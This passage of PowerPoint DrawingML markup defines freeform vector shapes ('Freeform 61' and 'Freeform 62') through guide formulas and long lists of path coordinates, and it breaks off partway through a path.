                  <a:gd name="T44" fmla="*/ 247 w 463"/>
                  <a:gd name="T45" fmla="*/ 162 h 631"/>
                  <a:gd name="T46" fmla="*/ 237 w 463"/>
                  <a:gd name="T47" fmla="*/ 179 h 631"/>
                  <a:gd name="T48" fmla="*/ 231 w 463"/>
                  <a:gd name="T49" fmla="*/ 199 h 631"/>
                  <a:gd name="T50" fmla="*/ 231 w 463"/>
                  <a:gd name="T51" fmla="*/ 199 h 631"/>
                  <a:gd name="T52" fmla="*/ 226 w 463"/>
                  <a:gd name="T53" fmla="*/ 215 h 631"/>
                  <a:gd name="T54" fmla="*/ 231 w 463"/>
                  <a:gd name="T55" fmla="*/ 236 h 631"/>
                  <a:gd name="T56" fmla="*/ 231 w 463"/>
                  <a:gd name="T57" fmla="*/ 236 h 631"/>
                  <a:gd name="T58" fmla="*/ 237 w 463"/>
                  <a:gd name="T59" fmla="*/ 257 h 631"/>
                  <a:gd name="T60" fmla="*/ 252 w 463"/>
                  <a:gd name="T61" fmla="*/ 278 h 631"/>
                  <a:gd name="T62" fmla="*/ 462 w 463"/>
                  <a:gd name="T63" fmla="*/ 540 h 631"/>
                  <a:gd name="T64" fmla="*/ 347 w 463"/>
                  <a:gd name="T65" fmla="*/ 630 h 631"/>
                  <a:gd name="T66" fmla="*/ 0 w 463"/>
                  <a:gd name="T67" fmla="*/ 194 h 631"/>
                  <a:gd name="T68" fmla="*/ 105 w 463"/>
                  <a:gd name="T69" fmla="*/ 110 h 6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63" h="631">
                    <a:moveTo>
                      <a:pt x="105" y="110"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="153" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="221" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="237" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="237" y="257"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="278"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="462" y="540"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="347" y="630"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="11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54" name="Freeform 61"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6697663" y="5632450"/>
                <a:ext cx="196850" cy="204788"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 263 w 547"/>
                  <a:gd name="T1" fmla="*/ 383 h 568"/>
                  <a:gd name="T2" fmla="*/ 299 w 547"/>
                  <a:gd name="T3" fmla="*/ 414 h 568"/>
                  <a:gd name="T4" fmla="*/ 336 w 547"/>
                  <a:gd name="T5" fmla="*/ 435 h 568"/>
                  <a:gd name="T6" fmla="*/ 373 w 547"/>
                  <a:gd name="T7" fmla="*/ 446 h 568"/>
                  <a:gd name="T8" fmla="*/ 389 w 547"/>
                  <a:gd name="T9" fmla="*/ 441 h 568"/>
                  <a:gd name="T10" fmla="*/ 404 w 547"/>
                  <a:gd name="T11" fmla="*/ 430 h 568"/>
                  <a:gd name="T12" fmla="*/ 426 w 547"/>
                  <a:gd name="T13" fmla="*/ 404 h 568"/>
                  <a:gd name="T14" fmla="*/ 426 w 547"/>
                  <a:gd name="T15" fmla="*/ 377 h 568"/>
                  <a:gd name="T16" fmla="*/ 415 w 547"/>
                  <a:gd name="T17" fmla="*/ 341 h 568"/>
                  <a:gd name="T18" fmla="*/ 489 w 547"/>
                  <a:gd name="T19" fmla="*/ 215 h 568"/>
                  <a:gd name="T20" fmla="*/ 515 w 547"/>
                  <a:gd name="T21" fmla="*/ 251 h 568"/>
                  <a:gd name="T22" fmla="*/ 546 w 547"/>
                  <a:gd name="T23" fmla="*/ 325 h 568"/>
                  <a:gd name="T24" fmla="*/ 546 w 547"/>
                  <a:gd name="T25" fmla="*/ 362 h 568"/>
                  <a:gd name="T26" fmla="*/ 525 w 547"/>
                  <a:gd name="T27" fmla="*/ 430 h 568"/>
                  <a:gd name="T28" fmla="*/ 467 w 547"/>
                  <a:gd name="T29" fmla="*/ 498 h 568"/>
                  <a:gd name="T30" fmla="*/ 441 w 547"/>
                  <a:gd name="T31" fmla="*/ 524 h 568"/>
                  <a:gd name="T32" fmla="*/ 389 w 547"/>
                  <a:gd name="T33" fmla="*/ 556 h 568"/>
                  <a:gd name="T34" fmla="*/ 363 w 547"/>
                  <a:gd name="T35" fmla="*/ 561 h 568"/>
                  <a:gd name="T36" fmla="*/ 310 w 547"/>
                  <a:gd name="T37" fmla="*/ 567 h 568"/>
                  <a:gd name="T38" fmla="*/ 268 w 547"/>
                  <a:gd name="T39" fmla="*/ 551 h 568"/>
                  <a:gd name="T40" fmla="*/ 226 w 547"/>
                  <a:gd name="T41" fmla="*/ 530 h 568"/>
                  <a:gd name="T42" fmla="*/ 184 w 547"/>
                  <a:gd name="T43" fmla="*/ 498 h 568"/>
                  <a:gd name="T44" fmla="*/ 110 w 547"/>
                  <a:gd name="T45" fmla="*/ 424 h 568"/>
                  <a:gd name="T46" fmla="*/ 42 w 547"/>
                  <a:gd name="T47" fmla="*/ 335 h 568"/>
                  <a:gd name="T48" fmla="*/ 21 w 547"/>
                  <a:gd name="T49" fmla="*/ 294 h 568"/>
                  <a:gd name="T50" fmla="*/ 6 w 547"/>
                  <a:gd name="T51" fmla="*/ 247 h 568"/>
                  <a:gd name="T52" fmla="*/ 0 w 547"/>
                  <a:gd name="T53" fmla="*/ 199 h 568"/>
                  <a:gd name="T54" fmla="*/ 11 w 547"/>
                  <a:gd name="T55" fmla="*/ 152 h 568"/>
                  <a:gd name="T56" fmla="*/ 21 w 547"/>
                  <a:gd name="T57" fmla="*/ 130 h 568"/>
                  <a:gd name="T58" fmla="*/ 58 w 547"/>
                  <a:gd name="T59" fmla="*/ 83 h 568"/>
                  <a:gd name="T60" fmla="*/ 84 w 547"/>
                  <a:gd name="T61" fmla="*/ 57 h 568"/>
                  <a:gd name="T62" fmla="*/ 152 w 547"/>
                  <a:gd name="T63" fmla="*/ 15 h 568"/>
                  <a:gd name="T64" fmla="*/ 173 w 547"/>
                  <a:gd name="T65" fmla="*/ 5 h 568"/>
                  <a:gd name="T66" fmla="*/ 257 w 547"/>
                  <a:gd name="T67" fmla="*/ 5 h 568"/>
                  <a:gd name="T68" fmla="*/ 299 w 547"/>
                  <a:gd name="T69" fmla="*/ 26 h 568"/>
                  <a:gd name="T70" fmla="*/ 342 w 547"/>
                  <a:gd name="T71" fmla="*/ 52 h 568"/>
                  <a:gd name="T72" fmla="*/ 426 w 547"/>
                  <a:gd name="T73" fmla="*/ 136 h 568"/>
                  <a:gd name="T74" fmla="*/ 236 w 547"/>
                  <a:gd name="T75" fmla="*/ 346 h 568"/>
                  <a:gd name="T76" fmla="*/ 247 w 547"/>
                  <a:gd name="T77" fmla="*/ 147 h 568"/>
                  <a:gd name="T78" fmla="*/ 231 w 547"/>
                  <a:gd name="T79" fmla="*/ 130 h 568"/>
                  <a:gd name="T80" fmla="*/ 210 w 547"/>
                  <a:gd name="T81" fmla="*/ 120 h 568"/>
                  <a:gd name="T82" fmla="*/ 179 w 547"/>
                  <a:gd name="T83" fmla="*/ 120 h 568"/>
                  <a:gd name="T84" fmla="*/ 163 w 547"/>
                  <a:gd name="T85" fmla="*/ 126 h 568"/>
                  <a:gd name="T86" fmla="*/ 147 w 547"/>
                  <a:gd name="T87" fmla="*/ 136 h 568"/>
                  <a:gd name="T88" fmla="*/ 126 w 547"/>
                  <a:gd name="T89" fmla="*/ 167 h 568"/>
                  <a:gd name="T90" fmla="*/ 121 w 547"/>
                  <a:gd name="T91" fmla="*/ 183 h 568"/>
                  <a:gd name="T92" fmla="*/ 126 w 547"/>
                  <a:gd name="T93" fmla="*/ 199 h 568"/>
                  <a:gd name="T94" fmla="*/ 142 w 547"/>
                  <a:gd name="T95" fmla="*/ 236 h 568"/>
                  <a:gd name="T96" fmla="*/ 179 w 547"/>
                  <a:gd name="T97" fmla="*/ 283 h 568"/>
                  <a:gd name="T98" fmla="*/ 289 w 547"/>
                  <a:gd name="T99" fmla="*/ 188 h 5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47" h="568">
                    <a:moveTo>
                      <a:pt x="263" y="383"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="263" y="383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="299" y="414"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="299" y="414"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="336" y="435"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="336" y="435"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="373" y="446"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="373" y="446"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="389" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="404" y="430"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="404" y="430"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="415" y="420"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="426" y="404"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="426" y="388"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="426" y="377"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="426" y="377"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="415" y="341"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="389" y="304"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="489" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="489" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="515" y="251"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="536" y="288"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="546" y="325"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="546" y="362"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="546" y="362"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="541" y="398"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="525" y="430"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="504" y="467"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="467" y="498"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="467" y="498"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="441" y="524"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="415" y="541"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="389" y="556"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="363" y="561"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="363" y="561"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="336" y="567"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="567"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="561"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="268" y="551"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="268" y="551"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="530"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="498"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="498"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="424"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="424"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="335"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="335"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="216" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="299" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="342" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="342" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="383" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="426" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="346"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="263" y="383"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="247" y="147"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="247" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="183"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="267"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="283"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="188"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="188"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="147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55" name="Freeform 62"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6838950" y="5391150"/>
                <a:ext cx="263525" cy="255588"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 457 w 731"/>
                  <a:gd name="T1" fmla="*/ 556 h 709"/>
                  <a:gd name="T2" fmla="*/ 493 w 731"/>
                  <a:gd name="T3" fmla="*/ 566 h 709"/>
                  <a:gd name="T4" fmla="*/ 530 w 731"/>
                  <a:gd name="T5" fmla="*/ 561 h 709"/>
                  <a:gd name="T6" fmla="*/ 572 w 731"/>
                  <a:gd name="T7" fmla="*/ 530 h 709"/>
                  <a:gd name="T8" fmla="*/ 593 w 731"/>
                  <a:gd name="T9" fmla="*/ 467 h 709"/>
                  <a:gd name="T10" fmla="*/ 588 w 731"/>
                  <a:gd name="T11" fmla="*/ 435 h 709"/>
                  <a:gd name="T12" fmla="*/ 562 w 731"/>
                  <a:gd name="T13" fmla="*/ 398 h 709"/>
                  <a:gd name="T14" fmla="*/ 525 w 731"/>
                  <a:gd name="T15" fmla="*/ 378 h 709"/>
                  <a:gd name="T16" fmla="*/ 488 w 731"/>
                  <a:gd name="T17" fmla="*/ 372 h 709"/>
                  <a:gd name="T18" fmla="*/ 441 w 731"/>
                  <a:gd name="T19" fmla="*/ 383 h 709"/>
                  <a:gd name="T20" fmla="*/ 336 w 731"/>
                  <a:gd name="T21" fmla="*/ 435 h 709"/>
                  <a:gd name="T22" fmla="*/ 257 w 731"/>
                  <a:gd name="T23" fmla="*/ 461 h 709"/>
                  <a:gd name="T24" fmla="*/ 184 w 731"/>
                  <a:gd name="T25" fmla="*/ 467 h 709"/>
                  <a:gd name="T26" fmla="*/ 116 w 731"/>
                  <a:gd name="T27" fmla="*/ 435 h 709"/>
                  <a:gd name="T28" fmla="*/ 47 w 731"/>
                  <a:gd name="T29" fmla="*/ 372 h 709"/>
                  <a:gd name="T30" fmla="*/ 0 w 731"/>
                  <a:gd name="T31" fmla="*/ 251 h 709"/>
                  <a:gd name="T32" fmla="*/ 21 w 731"/>
                  <a:gd name="T33" fmla="*/ 173 h 709"/>
                  <a:gd name="T34" fmla="*/ 73 w 731"/>
                  <a:gd name="T35" fmla="*/ 89 h 709"/>
                  <a:gd name="T36" fmla="*/ 147 w 731"/>
                  <a:gd name="T37" fmla="*/ 31 h 709"/>
                  <a:gd name="T38" fmla="*/ 220 w 731"/>
                  <a:gd name="T39" fmla="*/ 0 h 709"/>
                  <a:gd name="T40" fmla="*/ 299 w 731"/>
                  <a:gd name="T41" fmla="*/ 5 h 709"/>
                  <a:gd name="T42" fmla="*/ 393 w 731"/>
                  <a:gd name="T43" fmla="*/ 68 h 709"/>
                  <a:gd name="T44" fmla="*/ 257 w 731"/>
                  <a:gd name="T45" fmla="*/ 147 h 709"/>
                  <a:gd name="T46" fmla="*/ 226 w 731"/>
                  <a:gd name="T47" fmla="*/ 136 h 709"/>
                  <a:gd name="T48" fmla="*/ 173 w 731"/>
                  <a:gd name="T49" fmla="*/ 147 h 709"/>
                  <a:gd name="T50" fmla="*/ 147 w 731"/>
                  <a:gd name="T51" fmla="*/ 178 h 709"/>
                  <a:gd name="T52" fmla="*/ 136 w 731"/>
                  <a:gd name="T53" fmla="*/ 215 h 709"/>
                  <a:gd name="T54" fmla="*/ 136 w 731"/>
                  <a:gd name="T55" fmla="*/ 246 h 709"/>
                  <a:gd name="T56" fmla="*/ 168 w 731"/>
                  <a:gd name="T57" fmla="*/ 283 h 709"/>
                  <a:gd name="T58" fmla="*/ 220 w 731"/>
                  <a:gd name="T59" fmla="*/ 309 h 709"/>
                  <a:gd name="T60" fmla="*/ 252 w 731"/>
                  <a:gd name="T61" fmla="*/ 309 h 709"/>
                  <a:gd name="T62" fmla="*/ 410 w 731"/>
                  <a:gd name="T63" fmla="*/ 241 h 709"/>
                  <a:gd name="T64" fmla="*/ 483 w 731"/>
                  <a:gd name="T65" fmla="*/ 215 h 709"/>
                  <a:gd name="T66" fmla="*/ 546 w 731"/>
                  <a:gd name="T67" fmla="*/ 215 h 709"/>
                  <a:gd name="T68" fmla="*/ 598 w 731"/>
                  <a:gd name="T69" fmla="*/ 231 h 709"/>
                  <a:gd name="T70" fmla="*/ 651 w 731"/>
                  <a:gd name="T71" fmla="*/ 267 h 709"/>
                  <a:gd name="T72" fmla="*/ 724 w 731"/>
                  <a:gd name="T73" fmla="*/ 388 h 709"/>
                  <a:gd name="T74" fmla="*/ 719 w 731"/>
                  <a:gd name="T75" fmla="*/ 477 h 709"/>
                  <a:gd name="T76" fmla="*/ 640 w 731"/>
                  <a:gd name="T77" fmla="*/ 608 h 709"/>
                  <a:gd name="T78" fmla="*/ 557 w 731"/>
                  <a:gd name="T79" fmla="*/ 682 h 709"/>
                  <a:gd name="T80" fmla="*/ 478 w 731"/>
                  <a:gd name="T81" fmla="*/ 708 h 709"/>
                  <a:gd name="T82" fmla="*/ 363 w 731"/>
                  <a:gd name="T83" fmla="*/ 672 h 709"/>
                  <a:gd name="T84" fmla="*/ 404 w 731"/>
                  <a:gd name="T85" fmla="*/ 509 h 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731" h="709">
                    <a:moveTo>
                      <a:pt x="420" y="525"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="420" y="525"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="457" y="556"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="457" y="556"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="478" y="561"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="493" y="566"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="493" y="566"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="514" y="566"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="530" y="561"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="530" y="561"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="551" y="545"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="572" y="530"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="572" y="530"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="588" y="498"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="593" y="467"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="593" y="467"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="593" y="451"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="588" y="435"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="577" y="414"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="562" y="398"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="562" y="398"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="546" y="388"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="525" y="378"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="525" y="378"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="510" y="372"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="488" y="372"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="488" y="372"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="467" y="378"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="441" y="383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="441" y="383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="414"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="414"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="336" y="435"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="456"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="456"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="461"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="220" y="467"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="220" y="467"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="467"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="451"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="451"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="435"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="409"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="409"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="372"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="330"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="251"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="251"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="220" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="220" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="299" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="299" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="336" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="393" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="162"/>
